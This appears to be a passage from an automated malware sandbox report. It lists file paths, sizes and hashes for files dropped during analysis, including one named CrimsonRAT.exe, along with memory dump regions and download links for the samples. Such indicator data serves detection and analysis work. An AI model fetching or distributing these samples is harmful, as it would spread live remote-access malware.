7b7c26de4a8cb05acb8c037abc912c60fdb58b71699012dc8f90f75a8e2257b9

SHA512
beb46b0d992f7af16ee9432c07060983fd2c447c040db9e8213fbd800799d4476c5c2a3ebd906d359d0a7bbc9d096a3d71c65801aee427bf81986844102a57fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71E1965B.wmf

Filesize
430B

MD5
ebddb61c9c8c93381910975bdadc9c20

SHA1
0096a1133144d03ff0fb367b22d9c442bdcef64d

SHA256
432253d97e036fc435d425fde822a371f70e23369622c6ffe57fdf2fd5e7b3d3

SHA512
c93c55a765c14e67f6e0d3df987657f625f4ae8af3ddd5edcc2a53887a7931570287d2a13f095a35faa4f039f12098dac9f05d85a0b554f4e680590ea8de486e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\79AF0014.wmf

Filesize
430B

MD5
3d5fd3229e546e0ea630450477c96088

SHA1
7f51e49d8026bb9a746f8ad71b3848b4588c0b40

SHA256
0e103a0f23b626795418297912cd771f7b8aa1456fb3ceb6097912ff85e77937

SHA512
51a2b11e8b2aef09aac8cdf124bfabc745fa7d9330bb1fab3d011eb4c9c3cb0ca51737599a57afc5de5f833796e71226ca27e407043d3fa158e7565c9bb0e0f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\907A342.wmf

Filesize
430B

MD5
2f96d5384cca62eff8de0a0bd0919a76

SHA1
65e8d3f8cd2b9831d1a6f51513da59f468c34bc8

SHA256
7837ea160afa99f9ed643cc40e16d7aa204b7783f0ae35e4f6f920e7f5513917

SHA512
1ebcce51e9c92ddc41fcc39c2bf722fcad3d4474be762c22cdc310a3a2d95208fc851433a311d0840415198d5f6cf54796638825098d6fd8c8d776f3f7a6bf32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C0C64AA.wmf

Filesize
430B

MD5
7ce7fa56dff01fd8bd42a7dc16c236d6

SHA1
1289a2e7fd3e6ac535347695d9e0f41b6a0b5dd7

SHA256
fff17fb9cafe9d31ed5421a157620ea795422470d3aa371af4c05b7c159d9f74

SHA512
478f80b948623d709676d3cdffbb13d8162f627e332fe0290fe6fe7c9e2d2d1c4e7678fd07aaeabed4811304fbdcd525f576faf3573397c81ca0641a6f8657fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B156D8A3.wmf

Filesize
430B

MD5
fb9d194e693c693e57fac8824ef8ff84

SHA1
b519f72fe578a58965e984a9660d7259347f75ff

SHA256
5503a7a4b222c368bcbb8c3d4c512a9017bb7142c84821be6839b7a0ec6feb04

SHA512
fbcccf9396bb4191343b3a4c4dc0ffc1f0962df1d76cda88581520e692484a07a3b6620b9f41735c76d1b911ba54eee7a5d027774c07a4ff09d1c949fdfbfc63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B651969F.wmf

Filesize
430B

MD5
18d67a78f59fbdb38e8852b12ac6b719

SHA1
0131cfb69a43d827c0283a8ff30de48c3bbaf8a0

SHA256
a968ab2abeb32b54f029d7f86e481ee12bce5f9bc5f618bfccf276f8fbe17b9c

SHA512
7a8836718e81ea70f075c468fb17dea671c626897f47b10e6cd937bd90618dbdb6e4273f4f959c938889cd591a0e5f4a5a5bc0cb5225120eadadea0a830f3f68

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3A4F248.wmf

Filesize
430B

MD5
0e9be2cbc8f5c88b5ac8b061a30bf52c

SHA1
fd08962311c4c02b29c9989dfbe02f1b3201f439

SHA256
dd3848406c2be9cf11fd0c995d32d2f6ce24a14d7e1e2f31b0ae78ff09ec64d0

SHA512
96ebf99b8eebedb320aa23a1979a33580d3c82ec05363cdf98b3426081fedfdc66f60b0b3b77836f3853eb5e7e96884b0428f4a11c58cc9337fe6bc2a414b8bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6CF3796.wmf

Filesize
430B

MD5
1a196fb73eb27d2db24e59a9af7627c6

SHA1
3dd0e1a7c56e0bb2e2261c9d629823c5419b58d5

SHA256
26b64071133e10817eabf28d16d053ffca669aeee624fd069a0ec3f60bcaaa2c

SHA512
1fb0b442a63e7cf77ead163e19fda17d605b4b4af6a90bcba5a048374f653f258dd707c62e51f9e33c779b338a12ac7660c2ae7ba4f1c4a96584232896711e86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E9DEF905.wmf

Filesize
430B

MD5
44141c444e7f21d853f4bfc08596852b

SHA1
fb89440a30c7400f7eb4228bc5a8e2839695a3e4

SHA256
8e88c14430bdf0f9e8fb7f391965704d7d611613e56f87392f6846ba0edced5b

SHA512
fb0681ecff912ca0f88fbca122f0c7cacf151385193a814fe9c3300d9f4beb1aa93fbb9bee825c98197d9d7cc82145cbcb1095d9aa9c088b0b760e7bc4fe271a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarA136.tmp

Filesize
183KB

MD5
109cab5505f5e065b63d01361467a83b

SHA1
4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

SHA256
ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

SHA512
753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
8e125d8476844836bbc96da95c0081a2

SHA1
f7b2334c7709a4225bb1a9caccf4ce18add2c03e

SHA256
1db8bcbafb2d59d407880dfbae3f9c56967d9a7fd1a944756ba3a2a08c9a5379

SHA512
50c606e09481326e3d9f7caf289d179afd1935d18a87549a805448dba06a812248d2bbc5b778a45d5b14b13e0144c51d45aec4febe9355130bc3a528fa503fa3

Download Submit
C:\Users\Admin\Downloads\CrimsonRAT.exe

Filesize
84KB

MD5
b6e148ee1a2a3b460dd2a0adbf1dd39c

SHA1
ec0efbe8fd2fa5300164e9e4eded0d40da549c60

SHA256
dc31e710277eac1b125de6f4626765a2684d992147691a33964e368e5f269cba

SHA512
4b8c62ddfc7cd3e5ce1f8b5a1ba4a611ab1bfccf81d80cf2cfc831cffa1d7a4b6da0494616a53b419168bc3a324b57382d4a6186af083de6fc93d144c4503741

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 618288.crdownload

Filesize
1.0MB

MD5
055d1462f66a350d9886542d4d79bc2b

SHA1
f1086d2f667d807dbb1aa362a7a809ea119f2565

SHA256
dddf7894b2e6aafa1903384759d68455c3a4a8348a7e2da3bd272555eba9bec0

SHA512
2c5e570226252bdb2104c90d5b75f11493af8ed1be8cb0fd14e3f324311a82138753064731b80ce8e8b120b3fe7009b21a50e9f4583d534080e28ab84b83fee1

Download Submit
F:\$RECYCLE.BIN\S-1-5-21-2872745919-2748461613-2989606286-1000\desktop.ini

Filesize
129B

MD5
a526b9e7c716b3489d8cc062fbce4005

SHA1
2df502a944ff721241be20a9e449d2acd07e0312

SHA256
e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

SHA512
d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

Download Submit
\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\OFFICE.ODF

Filesize
4.1MB

MD5
c3da214ab5fb2e66e61fd8f63f72839f

SHA1
0ad2b19a1a59ec94d373d2c865431300c849902b

SHA256
9f4845358945756d231b58d2be9dddd1f436df1955daa79ab04149cf1289f4ef

SHA512
84f8035d685d517a0e5de019e61674288c087a48a5e01e1b9315e51ff9a4aa84fa72eb2487fd3357d5a1006a4e7c7ef343707347f997e1b66964b9e6c47c64f7

Download Submit
memory/496-888-0x0000000001380000-0x000000000139E000-memory.dmp

Filesize
120KB

Download
memory/628-4469-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/628-935-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/628-953-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/796-883-0x0000000001370000-0x000000000138E000-memory.dmp

Filesize
120KB

Download
memory/940-850-0x0000000000080000-0x0000000000994000-memory.dmp

Filesize
9.1MB

Download
memory/1092-878-0x00000000001A0000-0x00000000001BE000-memory.dmp

Filesize
120KB

Download
memory/1324-17705-0x00000000047F0000-0x0000000004800000-memory.dmp

Filesize
64KB

Download
memory/1500-473-0x0000000005040000-0x0000000005140000-memory.dmp

Filesize
1024KB

Download
memory/1500-599-0x00000000064B0000-0x00000000065B0000-memory.dmp

Filesize
1024KB

Download
memory/1500-739-0x000000007108D000-0x0000000071098000-memory.dmp

Filesize
44KB

Download
memory/1500-690-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1500-600-0x0000000006AD0000-0x0000000006CD0000-memory.dmp

Filesize
2.0MB

Download
memory/1500-601-0x0000000005040000-0x0000000005140000-memory.dmp

Filesize
1024KB

Download
memory/1500-602-0x0000000006AD0000-0x0000000006CD0000-memory.dmp

Filesize
2.0MB

Download
memory/1500-408-0x00000000064B0000-0x00000000065B0000-memory.dmp

Filesize
1024KB

Download
memory/1500-598-0x000000007108D000-0x0000000071098000-memory.dmp

Filesize
44KB

Download
memory/1500-344-0x000000002F491000-0x000000002F492000-memory.dmp

Filesize
4KB

Download
memory/1500-345-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1500-346-0x000000007108D000-0x0000000071098000-memory.dmp

Filesize
44KB

Download
memory/1500-491-0x0000000006AD0000-0x0000000006CD0000-memory.dmp

Filesize
2.0MB

Download
memory/1500-489-0x0000000006AD0000-0x0000000006CD0000-memory.dmp

Filesize
2.0MB

Download
memory/1500-490-0x0000000005040000-0x0000000005140000-memory.dmp

Filesize
1024KB

Download
memory/1500-474-0x0000000005040000-0x0000000005140000-memory.dmp

Filesize
1024KB

Download
memory/2592-498-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

Filesize
32KB

Download
memory/2592-497-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/2624-6446-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2624-7548-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2624-945-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/2628-825-0x0000000001240000-0x000000000125E000-memory.dmp

Filesize
120KB

Download